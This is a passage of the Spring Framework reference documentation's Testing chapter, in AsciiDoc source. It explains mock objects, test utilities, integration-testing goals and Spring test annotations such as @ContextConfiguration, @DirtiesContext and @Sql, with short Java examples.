framework.\n\n[[testing]]\n= Testing\n:doc-root: https:\/\/docs.spring.io\n:api-spring-framework: {doc-root}\/spring-framework\/docs\/{spring-version}\/javadoc-api\/org\/springframework\n:doc-spring-boot: {doc-root}\/spring-boot\/docs\/current\/reference\n:toc: left\n:toclevels: 2\n:docinfo1:\n\nThe Spring team advocates the test-driven-development (TDD) approach to software\ndevelopment, and so this chapter covers Spring's support for integration testing\nalongside best practices for unit testing. The Spring team has found that the correct\nuse of IoC makes both unit and integration testing easier, in that the presence of\nsetter methods and appropriate constructors on classes makes them easier to wire\ntogether in a test without having to set up service locator registries and suchlike.\nThe chapter dedicated solely to testing will hopefully convince you of this as well.\n\n\n[[testing-introduction]]\n== Introduction to Spring Testing\nTesting is an integral part of enterprise software development. This chapter focuses on\nthe value-add of the IoC principle to <<unit-testing,unit testing>> and on the benefits\nof the Spring Framework's support for <<integration-testing,integration testing>>. __(A\nthorough treatment of testing in the enterprise is beyond the scope of this reference\nmanual.)__\n\n\n[[unit-testing]]\n== Unit Testing\nDependency Injection should make your code less dependent on the container than it would\nbe with traditional Java EE development. The POJOs that make up your application should\nbe testable in JUnit or TestNG tests, with objects simply instantiated using the `new`\noperator, __without Spring or any other container__. 
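\n\nFor example, a simple service POJO can be exercised directly in a plain JUnit 4 test.\nThe following is a minimal sketch only; the `GreetingService` class and its `greet`\nmethod are hypothetical names used purely for illustration.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class GreetingServiceTests {\n\n\t\t@Test\n\t\tpublic void greetsByName() {\n\t\t\t\/\/ no container involved: plain instantiation via the new operator\n\t\t\tGreetingService service = new GreetingService();\n\t\t\tassertEquals(\"Hello, Juergen!\", service.greet(\"Juergen\"));\n\t\t}\n\t}\n----\n\n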
You can use <<mock-objects,mock\nobjects>> (in conjunction with other valuable testing techniques) to test your code in\nisolation. If you follow the architecture recommendations for Spring, the resulting\nclean layering and componentization of your codebase will facilitate easier unit\ntesting. For example, you can test service layer objects by stubbing or mocking DAO or\nRepository interfaces, without needing to access persistent data while running unit\ntests.\n\nTrue unit tests typically run extremely quickly, as there is no runtime infrastructure\nto set up. Emphasizing true unit tests as part of your development methodology will\nboost your productivity. You may not need this section of the testing chapter to help\nyou write effective unit tests for your IoC-based applications. For certain unit testing\nscenarios, however, the Spring Framework provides the following mock objects and testing\nsupport classes.\n\n\n\n[[mock-objects]]\n=== Mock Objects\n\n\n[[mock-objects-env]]\n==== Environment\nThe `org.springframework.mock.env` package contains mock implementations of the\n`Environment` and `PropertySource` abstractions (see\n<<core.adoc#beans-definition-profiles, Bean definition profiles>>\nand <<core.adoc#beans-property-source-abstraction, PropertySource abstraction>>).\n`MockEnvironment` and `MockPropertySource` are useful for developing\n__out-of-container__ tests for code that depends on environment-specific properties.\n\n\n[[mock-objects-jndi]]\n==== JNDI\nThe `org.springframework.mock.jndi` package contains an implementation of the JNDI SPI,\nwhich you can use to set up a simple JNDI environment for test suites or stand-alone\napplications. If, for example, JDBC ``DataSource``s get bound to the same JNDI names in\ntest code as within a Java EE container, you can reuse both application code and\nconfiguration in testing scenarios without modification.\n\n\n[[mock-objects-servlet]]\n==== Servlet API\nThe `org.springframework.mock.web` package contains a comprehensive set of Servlet API\nmock objects, which are useful for testing web contexts, controllers, and filters. These\nmock objects are targeted at usage with Spring's Web MVC framework and are generally more\nconvenient to use than dynamic mock objects such as http:\/\/www.easymock.org[EasyMock] or\nalternative Servlet API mock objects such as http:\/\/www.mockobjects.com[MockObjects]. Since\nSpring Framework 5.0, the set of mocks in the `org.springframework.mock.web` package is\nbased on the Servlet 4.0 API.\n\nFor thorough integration testing of your Spring MVC and REST ``Controller``s in\nconjunction with your `WebApplicationContext` configuration for Spring MVC, see the\n<<spring-mvc-test-framework,_Spring MVC Test Framework_>>.\n\n\n\n[[unit-testing-support-classes]]\n=== Unit Testing support Classes\n\n\n[[unit-testing-utilities]]\n==== General testing utilities\nThe `org.springframework.test.util` package contains several general purpose utilities\nfor use in unit and integration testing.\n\n`ReflectionTestUtils` is a collection of reflection-based utility methods. 
Developers use\nthese methods in testing scenarios where they need to change the value of a constant, set\na non-`public` field, invoke a non-`public` setter method, or invoke a non-`public`\n_configuration_ or _lifecycle_ callback method when testing application code involving\nuse cases such as the following.\n\n* ORM frameworks such as JPA and Hibernate that condone `private` or `protected` field\n access as opposed to `public` setter methods for properties in a domain entity.\n* Spring's support for annotations such as `@Autowired`, `@Inject`, and `@Resource`,\n which provides dependency injection for `private` or `protected` fields, setter\n methods, and configuration methods.\n* Use of annotations such as `@PostConstruct` and `@PreDestroy` for lifecycle callback\n methods.\n\n`AopTestUtils` is a collection of AOP-related utility methods. These methods can be used\nto obtain a reference to the underlying target object hidden behind one or more Spring\nproxies. For example, if you have configured a bean as a dynamic mock using a library\nlike EasyMock or Mockito and the mock is wrapped in a Spring proxy, you may need direct\naccess to the underlying mock in order to configure expectations on it and perform\nverifications. For Spring's core AOP utilities, see `AopUtils` and `AopProxyUtils`.\n\n\n\n[[unit-testing-spring-mvc]]\n==== Spring MVC\nThe `org.springframework.test.web` package contains `ModelAndViewAssert`, which you can\nuse in combination with JUnit, TestNG, or any other testing framework for unit tests\ndealing with Spring MVC `ModelAndView` objects.\n\n.Unit testing Spring MVC Controllers\n[TIP]\n====\nTo unit test your Spring MVC ``Controller``s as POJOs, use `ModelAndViewAssert` combined\nwith `MockHttpServletRequest`, `MockHttpSession`, and so on from Spring's\n<<mock-objects-servlet, Servlet API mocks>>. For thorough integration testing of your\nSpring MVC and REST ``Controller``s in conjunction with your `WebApplicationContext`\nconfiguration for Spring MVC, use the <<spring-mvc-test-framework,_Spring MVC Test\nFramework_>> instead.\n====\n\n\n\n\n[[integration-testing]]\n== Integration Testing\n\n\n\n[[integration-testing-overview]]\n=== Overview\nIt is important to be able to perform some integration testing without requiring\ndeployment to your application server or connecting to other enterprise infrastructure.\nThis will enable you to test things such as:\n\n* The correct wiring of your Spring IoC container contexts.\n* Data access using JDBC or an ORM tool. This would include such things as the\n correctness of SQL statements, Hibernate queries, JPA entity mappings, etc.\n\nThe Spring Framework provides first-class support for integration testing in the\n`spring-test` module. The name of the actual JAR file might include the release version\nand might also be in the long `org.springframework.test` form, depending on where you\nget it from (see the <<core.adoc#dependency-management,section on Dependency Management>> for an\nexplanation). This library includes the `org.springframework.test` package, which\ncontains valuable classes for integration testing with a Spring container. This testing\ndoes not rely on an application server or other deployment environment. 
Such tests are\nslower to run than unit tests but much faster than the equivalent Selenium tests or remote\ntests that rely on deployment to an application server.\n\nIn Spring 2.5 and later, unit and integration testing support is provided in the form of\nthe annotation-driven <<testcontext-framework,Spring TestContext Framework>>. The\nTestContext framework is agnostic of the actual testing framework in use, thus allowing\ninstrumentation of tests in various environments including JUnit, TestNG, and so on.\n\n[[integration-testing-goals]]\n=== Goals of Integration Testing\nSpring's integration testing support has the following primary goals:\n\n* To manage <<testing-ctx-management,Spring IoC container caching>> between test\n executions.\n* To provide <<testing-fixture-di,Dependency Injection of test fixture instances>>.\n* To provide <<testing-tx,transaction management>> appropriate to integration testing.\n* To supply <<testing-support-classes,Spring-specific base classes>> that assist\n developers in writing integration tests.\n\nThe next few sections describe each goal and provide links to implementation and\nconfiguration details.\n\n[[testing-ctx-management]]\n==== Context management and caching\nThe Spring TestContext Framework provides consistent loading of Spring\n``ApplicationContext``s and ``WebApplicationContext``s as well as caching of those\ncontexts. Support for the caching of loaded contexts is important, because startup time\ncan become an issue -- not because of the overhead of Spring itself, but because the\nobjects instantiated by the Spring container take time to instantiate. For example, a\nproject with 50 to 100 Hibernate mapping files might take 10 to 20 seconds to load the\nmapping files, and incurring that cost before running every test in every test fixture\nleads to slower overall test runs that reduce developer productivity.\n\nTest classes typically declare either an array of __resource locations__ for XML or Groovy\nconfiguration metadata -- often in the classpath -- or an array of __annotated classes__\nthat is used to configure the application. These locations or classes are the same as or\nsimilar to those specified in `web.xml` or other configuration files for production\ndeployments.\n\nBy default, once loaded, the configured `ApplicationContext` is reused for each test.\nThus the setup cost is incurred only once per test suite, and subsequent test execution\nis much faster. In this context, the term __test suite__ means all tests run in the same\nJVM -- for example, all tests run from an Ant, Maven, or Gradle build for a given\nproject or module. In the unlikely case that a test corrupts the application context and\nrequires reloading -- for example, by modifying a bean definition or the state of an\napplication object -- the TestContext framework can be configured to reload the\nconfiguration and rebuild the application context before executing the next test.\n\nSee <<testcontext-ctx-management>> and <<testcontext-ctx-management-caching>> for\ndetails on context management and caching with the TestContext framework.\n\n\n[[testing-fixture-di]]\n==== Dependency Injection of test fixtures\nWhen the TestContext framework loads your application context, it can optionally\nconfigure instances of your test classes via Dependency Injection. This provides a\nconvenient mechanism for setting up test fixtures using preconfigured beans from your\napplication context, as the following sketch illustrates. 
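\n\nIn this minimal sketch, the `TitleRepository` type, its `findById` method, and the\n`\/repository-config.xml` resource are hypothetical names used purely for illustration.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration(\"\/repository-config.xml\")\n\tpublic class TitleRepositoryTests {\n\n\t\t\/\/ injected from the loaded ApplicationContext\n\t\t@Autowired\n\t\tTitleRepository titleRepository;\n\n\t\t@Test\n\t\tpublic void findsTitleById() {\n\t\t\tassertNotNull(this.titleRepository.findById(1L));\n\t\t}\n\t}\n----\n\n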
A strong benefit here is that you can reuse application contexts\nacross various testing scenarios (e.g., for configuring Spring-managed object graphs,\ntransactional proxies, ``DataSource``s, etc.), thus avoiding the need to duplicate\ncomplex test fixture setup for individual test cases.\n\nAs an example, consider the scenario where we have a class, `HibernateTitleRepository`,\nthat implements data access logic for a `Title` domain entity. We want to write\nintegration tests that test the following areas:\n\n* The Spring configuration: basically, is everything related to the configuration of the\n `HibernateTitleRepository` bean correct and present?\n* The Hibernate mapping file configuration: is everything mapped correctly, and are the\n correct lazy-loading settings in place?\n* The logic of the `HibernateTitleRepository`: does the configured instance of this\n class perform as anticipated?\n\nSee dependency injection of test fixtures with the <<testcontext-fixture-di,TestContext\nframework>>.\n\n\n[[testing-tx]]\n==== Transaction management\nOne common issue in tests that access a real database is their effect on the state of\nthe persistence store. Even when you're using a development database, changes to the\nstate may affect future tests. Also, many operations -- such as inserting or modifying\npersistent data -- cannot be performed (or verified) outside a transaction.\n\nThe TestContext framework addresses this issue. By default, the framework will create\nand roll back a transaction for each test. You simply write code that can assume the\nexistence of a transaction. If you call transactionally proxied objects in your tests,\nthey will behave correctly, according to their configured transactional semantics. In\naddition, if a test method deletes the contents of selected tables while running within\nthe transaction managed for the test, the transaction will roll back by default, and the\ndatabase will return to its state prior to execution of the test. Transactional support\nis provided to a test via a `PlatformTransactionManager` bean defined in the test's\napplication context.\n\nIf you want a transaction to commit -- unusual, but occasionally useful when you want a\nparticular test to populate or modify the database -- the TestContext framework can be\ninstructed to cause the transaction to commit instead of roll back via the\n<<integration-testing-annotations, `@Commit`>> annotation.\n\nSee transaction management with the <<testcontext-tx,TestContext framework>>.\n\n\n[[testing-support-classes]]\n==== Support classes for integration testing\nThe Spring TestContext Framework provides several `abstract` support classes that\nsimplify the writing of integration tests. These base test classes provide well-defined\nhooks into the testing framework as well as convenient instance variables and methods,\nwhich enable you to access:\n\n* The `ApplicationContext`, for performing explicit bean lookups or testing the state of\n the context as a whole.\n* A `JdbcTemplate`, for executing SQL statements to query the database. Such queries can\n be used to confirm database state both __prior to__ and __after__ execution of\n database-related application code, and Spring ensures that such queries run in the\n scope of the same transaction as the application code. 
When used in conjunction with\n an ORM tool, be sure to avoid <<testcontext-tx-false-positives,false positives>>.\n\nIn addition, you may want to create your own custom, application-wide superclass with\ninstance variables and methods specific to your project.\n\nSee support classes for the <<testcontext-support-classes,TestContext framework>>.\n\n\n\n[[integration-testing-support-jdbc]]\n=== JDBC Testing Support\nThe `org.springframework.test.jdbc` package contains `JdbcTestUtils`, which is a\ncollection of JDBC related utility functions intended to simplify standard database\ntesting scenarios. Specifically, `JdbcTestUtils` provides the following static utility\nmethods.\n\n* `countRowsInTable(..)`: counts the number of rows in the given table\n* `countRowsInTableWhere(..)`: counts the number of rows in the given table, using\nthe provided `WHERE` clause\n* `deleteFromTables(..)`: deletes all rows from the specified tables\n* `deleteFromTableWhere(..)`: deletes rows from the given table, using the provided\n`WHERE` clause\n* `dropTables(..)`: drops the specified tables\n\n__Note that <<testcontext-support-classes-junit4,\n`AbstractTransactionalJUnit4SpringContextTests`>> and\n<<testcontext-support-classes-testng, `AbstractTransactionalTestNGSpringContextTests`>>\nprovide convenience methods which delegate to the aforementioned methods in\n`JdbcTestUtils`.__\n\nThe `spring-jdbc` module provides support for configuring and launching an embedded\ndatabase which can be used in integration tests that interact with a database. For\ndetails, see <<data-access.adoc#jdbc-embedded-database-support, Embedded database support>>\nand <<data-access.adoc#jdbc-embedded-database-dao-testing, Testing data access logic\nwith an embedded database>>.\n\n\n\n[[integration-testing-annotations]]\n=== Annotations\n\n\n[[integration-testing-annotations-spring]]\n==== Spring Testing Annotations\nThe Spring Framework provides the following set of __Spring-specific__ annotations that\nyou can use in your unit and integration tests in conjunction with the TestContext\nframework. Refer to the corresponding javadocs for further information, including\ndefault attribute values, attribute aliases, and so on.\n\n===== @BootstrapWith\n`@BootstrapWith` is a class-level annotation that is used to configure how the _Spring\nTestContext Framework_ is bootstrapped. Specifically, `@BootstrapWith` is used to specify\na custom `TestContextBootstrapper`. Consult the <<testcontext-bootstrapping,Bootstrapping\nthe TestContext framework>> section for further details.\n\n===== @ContextConfiguration\n`@ContextConfiguration` defines class-level metadata that is used to determine how to\nload and configure an `ApplicationContext` for integration tests. Specifically,\n`@ContextConfiguration` declares the application context resource `locations` or the\nannotated `classes` that will be used to load the context.\n\nResource locations are typically XML configuration files or Groovy scripts located in\nthe classpath; whereas, annotated classes are typically `@Configuration` classes. 
However,\nresource locations can also refer to files and scripts in the file system, and annotated\nclasses can be component classes, etc.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ContextConfiguration**(\"\/test-config.xml\")\n\tpublic class XmlApplicationContextTests {\n\t\t\/\/ class body...\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ContextConfiguration**(**classes** = TestConfig.class)\n\tpublic class ConfigClassApplicationContextTests {\n\t\t\/\/ class body...\n\t}\n----\n\nAs an alternative or in addition to declaring resource locations or annotated classes,\n`@ContextConfiguration` may be used to declare `ApplicationContextInitializer` classes.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ContextConfiguration**(**initializers** = CustomContextInitializer.class)\n\tpublic class ContextInitializerTests {\n\t\t\/\/ class body...\n\t}\n----\n\n`@ContextConfiguration` may optionally be used to declare the `ContextLoader` strategy\nas well. Note, however, that you typically do not need to explicitly configure the\nloader since the default loader supports either resource `locations` or annotated\n`classes` as well as `initializers`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ContextConfiguration**(**locations** = \"\/test-context.xml\", **loader** = CustomContextLoader.class)\n\tpublic class CustomLoaderXmlApplicationContextTests {\n\t\t\/\/ class body...\n\t}\n----\n\n[NOTE]\n====\n`@ContextConfiguration` provides support for __inheriting__ resource locations or\nconfiguration classes as well as context initializers declared by superclasses by\ndefault.\n====\n\nSee <<testcontext-ctx-management>> and the `@ContextConfiguration` javadocs for\nfurther details.\n\n===== @WebAppConfiguration\n`@WebAppConfiguration` is a class-level annotation that is used to declare that the\n`ApplicationContext` loaded for an integration test should be a `WebApplicationContext`.\nThe mere presence of `@WebAppConfiguration` on a test class ensures that a\n`WebApplicationContext` will be loaded for the test, using the default value of\n`\"file:src\/main\/webapp\"` for the path to the root of the web application (i.e., the\n__resource base path__). The resource base path is used behind the scenes to create a\n`MockServletContext` which serves as the `ServletContext` for the test's\n`WebApplicationContext`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@WebAppConfiguration**\n\tpublic class WebAppTests {\n\t\t\/\/ class body...\n\t}\n----\n\nTo override the default, specify a different base resource path via the __implicit__\n`value` attribute. Both `classpath:` and `file:` resource prefixes are supported. If no\nresource prefix is supplied, the path is assumed to be a file system resource.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@WebAppConfiguration(\"classpath:test-web-resources\")**\n\tpublic class WebAppTests {\n\t\t\/\/ class body...\n\t}\n----\n\nNote that `@WebAppConfiguration` must be used in conjunction with\n`@ContextConfiguration`, either within a single test class or within a test class\nhierarchy. See the `@WebAppConfiguration` javadocs for further details.\n\n===== @ContextHierarchy\n`@ContextHierarchy` is a class-level annotation that is used to define a hierarchy of\n``ApplicationContext``s for integration tests. 
`@ContextHierarchy` should be declared\nwith a list of one or more `@ContextConfiguration` instances, each of which defines a\nlevel in the context hierarchy. The following examples demonstrate the use of\n`@ContextHierarchy` within a single test class; however, `@ContextHierarchy` can also be\nused within a test class hierarchy.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(\"\/parent-config.xml\"),\n\t\t@ContextConfiguration(\"\/child-config.xml\")\n\t})\n\tpublic class ContextHierarchyTests {\n\t\t\/\/ class body...\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@WebAppConfiguration\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(classes = AppConfig.class),\n\t\t@ContextConfiguration(classes = WebConfig.class)\n\t})\n\tpublic class WebIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\nIf you need to merge or override the configuration for a given level of the context\nhierarchy within a test class hierarchy, you must explicitly name that level by\nsupplying the same value to the `name` attribute in `@ContextConfiguration` at each\ncorresponding level in the class hierarchy. See\n<<testcontext-ctx-management-ctx-hierarchies>> and the `@ContextHierarchy` javadocs\nfor further examples.\n\n===== @ActiveProfiles\n`@ActiveProfiles` is a class-level annotation that is used to declare which __bean\ndefinition profiles__ should be active when loading an `ApplicationContext` for an\nintegration test.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@ActiveProfiles**(\"dev\")\n\tpublic class DeveloperTests {\n\t\t\/\/ class body...\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@ActiveProfiles**({\"dev\", \"integration\"})\n\tpublic class DeveloperIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\n[NOTE]\n====\n`@ActiveProfiles` provides support for __inheriting__ active bean definition profiles\ndeclared by superclasses by default. It is also possible to resolve active bean\ndefinition profiles programmatically by implementing a custom\n<<testcontext-ctx-management-env-profiles-ActiveProfilesResolver,`ActiveProfilesResolver`>>\nand registering it via the `resolver` attribute of `@ActiveProfiles`.\n====\n\nSee <<testcontext-ctx-management-env-profiles>> and the `@ActiveProfiles` javadocs\nfor examples and further details.\n\n===== @TestPropertySource\n`@TestPropertySource` is a class-level annotation that is used to configure the locations\nof properties files and inlined properties to be added to the set of `PropertySources` in\nthe `Environment` for an `ApplicationContext` loaded for an integration test.\n\nTest property sources have higher precedence than those loaded from the operating\nsystem's environment or Java system properties as well as property sources added by the\napplication declaratively via `@PropertySource` or programmatically. Thus, test property\nsources can be used to selectively override properties defined in system and application\nproperty sources. 
Furthermore, inlined properties have higher precedence than properties\nloaded from resource locations.\n\nThe following example demonstrates how to declare a properties file from the classpath.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@TestPropertySource**(\"\/test.properties\")\n\tpublic class MyIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\nThe following example demonstrates how to declare _inlined_ properties.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@TestPropertySource**(properties = { \"timezone = GMT\", \"port: 4242\" })\n\tpublic class MyIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\n===== @DirtiesContext\n`@DirtiesContext` indicates that the underlying Spring `ApplicationContext` has been\n__dirtied__ during the execution of a test (i.e., modified or corrupted in some manner --\nfor example, by changing the state of a singleton bean) and should be closed. When an\napplication context is marked __dirty__, it is removed from the testing framework's cache\nand closed. As a consequence, the underlying Spring container will be rebuilt for any\nsubsequent test that requires a context with the same configuration metadata.\n\n`@DirtiesContext` can be used as both a class-level and method-level annotation within\nthe same class or class hierarchy. In such scenarios, the `ApplicationContext` is marked\nas __dirty__ before or after any such annotated method as well as before or after the\ncurrent test class, depending on the configured `methodMode` and `classMode`.\n\nThe following examples explain when the context would be dirtied for various\nconfiguration scenarios:\n\n* Before the current test class, when declared on a class with class mode set to\n`BEFORE_CLASS`.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext(classMode = BEFORE_CLASS)**\n\tpublic class FreshContextTests {\n\t\t\/\/ some tests that require a new Spring container\n\t}\n----\n\n+\n\n* After the current test class, when declared on a class with class mode set to\n`AFTER_CLASS` (i.e., the default class mode).\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext**\n\tpublic class ContextDirtyingTests {\n\t\t\/\/ some tests that result in the Spring container being dirtied\n\t}\n----\n\n+\n\n* Before each test method in the current test class, when declared on a class with class\nmode set to `BEFORE_EACH_TEST_METHOD`.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext(classMode = BEFORE_EACH_TEST_METHOD)**\n\tpublic class FreshContextTests {\n\t\t\/\/ some tests that require a new Spring container\n\t}\n----\n\n+\n\n* After each test method in the current test class, when declared on a class with class\nmode set to `AFTER_EACH_TEST_METHOD`.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext(classMode = AFTER_EACH_TEST_METHOD)**\n\tpublic class ContextDirtyingTests {\n\t\t\/\/ some tests that result in the Spring container being dirtied\n\t}\n----\n\n+\n\n* Before the current test, when declared on a method with the method mode set to\n`BEFORE_METHOD`.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext(methodMode = BEFORE_METHOD)**\n\t@Test\n\tpublic void testProcessWhichRequiresFreshAppCtx() {\n\t\t\/\/ some logic that requires a new Spring container\n\t}\n----\n\n+\n\n* After the current test, when declared on a method with the method 
mode set to\n`AFTER_METHOD` (i.e., the default method mode).\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext**\n\t@Test\n\tpublic void testProcessWhichDirtiesAppCtx() {\n\t\t\/\/ some logic that results in the Spring container being dirtied\n\t}\n----\n\nIf `@DirtiesContext` is used in a test whose context is configured as part of a context\nhierarchy via `@ContextHierarchy`, the `hierarchyMode` flag can be used to control how\nthe context cache is cleared. By default an __exhaustive__ algorithm will be used that\nclears the context cache including not only the current level but also all other context\nhierarchies that share an ancestor context common to the current test; all\n``ApplicationContext``s that reside in a sub-hierarchy of the common ancestor context\nwill be removed from the context cache and closed. If the __exhaustive__ algorithm is\noverkill for a particular use case, the simpler __current level__ algorithm can be\nspecified instead, as seen below.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(\"\/parent-config.xml\"),\n\t\t@ContextConfiguration(\"\/child-config.xml\")\n\t})\n\tpublic class BaseTests {\n\t\t\/\/ class body...\n\t}\n\n\tpublic class ExtendedTests extends BaseTests {\n\n\t\t@Test\n\t\t@DirtiesContext(**hierarchyMode = CURRENT_LEVEL**)\n\t\tpublic void test() {\n\t\t\t\/\/ some logic that results in the child context being dirtied\n\t\t}\n\t}\n----\n\nFor further details regarding the `EXHAUSTIVE` and `CURRENT_LEVEL` algorithms see the\n`DirtiesContext.HierarchyMode` javadocs.\n\n===== @TestExecutionListeners\n`@TestExecutionListeners` defines class-level metadata for configuring the\n`TestExecutionListener` implementations that should be registered with the\n`TestContextManager`. Typically, `@TestExecutionListeners` is used in conjunction with\n`@ContextConfiguration`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@TestExecutionListeners**({CustomTestExecutionListener.class, AnotherTestExecutionListener.class})\n\tpublic class CustomTestExecutionListenerTests {\n\t\t\/\/ class body...\n\t}\n----\n\n`@TestExecutionListeners` supports _inherited_ listeners by default. See the javadocs\nfor an example and further details.\n\n===== @Commit\n`@Commit` indicates that the transaction for a transactional test method should be\n__committed__ after the test method has completed. `@Commit` can be used as a direct\nreplacement for `@Rollback(false)` in order to more explicitly convey the intent of the\ncode. Analogous to `@Rollback`, `@Commit` may also be declared as a class-level or\nmethod-level annotation.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@Commit**\n\t@Test\n\tpublic void testProcessWithoutRollback() {\n\t\t\/\/ ...\n\t}\n----\n\n===== @Rollback\n`@Rollback` indicates whether the transaction for a transactional test method should be\n__rolled back__ after the test method has completed. If `true`, the transaction is rolled\nback; otherwise, the transaction is committed (see also `@Commit`). Rollback semantics\nfor integration tests in the Spring TestContext Framework default to `true` even if\n`@Rollback` is not explicitly declared.\n\nWhen declared as a class-level annotation, `@Rollback` defines the default rollback\nsemantics for all test methods within the test class hierarchy. 
When declared as a\nmethod-level annotation, `@Rollback` defines rollback semantics for the specific test\nmethod, potentially overriding class-level `@Rollback` or `@Commit` semantics.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@Rollback**(false)\n\t@Test\n\tpublic void testProcessWithoutRollback() {\n\t\t\/\/ ...\n\t}\n----\n\n===== @BeforeTransaction\n`@BeforeTransaction` indicates that the annotated `void` method should be executed\n__before__ a transaction is started for test methods configured to run within a\ntransaction via Spring's `@Transactional` annotation. As of Spring Framework 4.3,\n`@BeforeTransaction` methods are not required to be `public` and may be declared on Java\n8 based interface default methods.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@BeforeTransaction**\n\tvoid beforeTransaction() {\n\t\t\/\/ logic to be executed before a transaction is started\n\t}\n----\n\n===== @AfterTransaction\n`@AfterTransaction` indicates that the annotated `void` method should be executed\n__after__ a transaction is ended for test methods configured to run within a transaction\nvia Spring's `@Transactional` annotation. As of Spring Framework 4.3, `@AfterTransaction`\nmethods are not required to be `public` and may be declared on Java 8 based interface\ndefault methods.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@AfterTransaction**\n\tvoid afterTransaction() {\n\t\t\/\/ logic to be executed after a transaction has ended\n\t}\n----\n\n===== @Sql\n`@Sql` is used to annotate a test class or test method to configure SQL scripts to be\nexecuted against a given database during integration tests.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Test\n\t**@Sql**({\"\/test-schema.sql\", \"\/test-user-data.sql\"})\n\tpublic void userTest() {\n\t\t\/\/ execute code that relies on the test schema and test data\n\t}\n----\n\nSee <<testcontext-executing-sql-declaratively>> for further details.\n\n===== @SqlConfig\n`@SqlConfig` defines metadata that is used to determine how to parse and execute SQL\nscripts configured via the `@Sql` annotation.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Test\n\t@Sql(\n\t\tscripts = \"\/test-user-data.sql\",\n\t\tconfig = **@SqlConfig**(commentPrefix = \"`\", separator = \"@@\")\n\t)\n\tpublic void userTest() {\n\t\t\/\/ execute code that relies on the test data\n\t}\n----\n\n===== @SqlGroup\n`@SqlGroup` is a container annotation that aggregates several `@Sql` annotations.\n`@SqlGroup` can be used natively, declaring several nested `@Sql` annotations, or it can\nbe used in conjunction with Java 8's support for repeatable annotations, where `@Sql` can\nsimply be declared several times on the same class or method, implicitly generating this\ncontainer annotation.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Test\n\t**@SqlGroup**({\n\t\t@Sql(scripts = \"\/test-schema.sql\", config = @SqlConfig(commentPrefix = \"`\")),\n\t\t@Sql(\"\/test-user-data.sql\")\n\t})\n\tpublic void userTest() {\n\t\t\/\/ execute code that uses the test schema and test data\n\t}\n----\n\n\n[[integration-testing-annotations-standard]]\n==== Standard Annotation Support\nThe following annotations are supported with standard semantics for all configurations\nof the Spring TestContext Framework. 
Note that these annotations are not specific to\ntests and can be used anywhere in the Spring Framework.\n\n* `@Autowired`\n* `@Qualifier`\n* `@Resource` (javax.annotation) _if JSR-250 is present_\n* `@ManagedBean` (javax.annotation) _if JSR-250 is present_\n* `@Inject` (javax.inject) _if JSR-330 is present_\n* `@Named` (javax.inject) _if JSR-330 is present_\n* `@PersistenceContext` (javax.persistence) _if JPA is present_\n* `@PersistenceUnit` (javax.persistence) _if JPA is present_\n* `@Required`\n* `@Transactional`\n\n.JSR-250 Lifecycle Annotations\n[NOTE]\n====\nIn the Spring TestContext Framework `@PostConstruct` and `@PreDestroy` may be used with\nstandard semantics on any application components configured in the `ApplicationContext`;\nhowever, these lifecycle annotations have limited usage within an actual test class.\n\nIf a method within a test class is annotated with `@PostConstruct`, that method will be\nexecuted before any __before__ methods of the underlying test framework (e.g., methods\nannotated with JUnit Jupiter's `@BeforeEach`), and that will apply for every test method\nin the test class. On the other hand, if a method within a test class is annotated with\n`@PreDestroy`, that method will __never__ be executed. Within a test class it is\ntherefore recommended to use test lifecycle callbacks from the underlying test framework\ninstead of `@PostConstruct` and `@PreDestroy`.\n====\n\n\n[[integration-testing-annotations-junit4]]\n==== Spring JUnit 4 Testing Annotations\n\nThe following annotations are __only__ supported when used in conjunction with the\n<<testcontext-junit4-runner,SpringRunner>>, 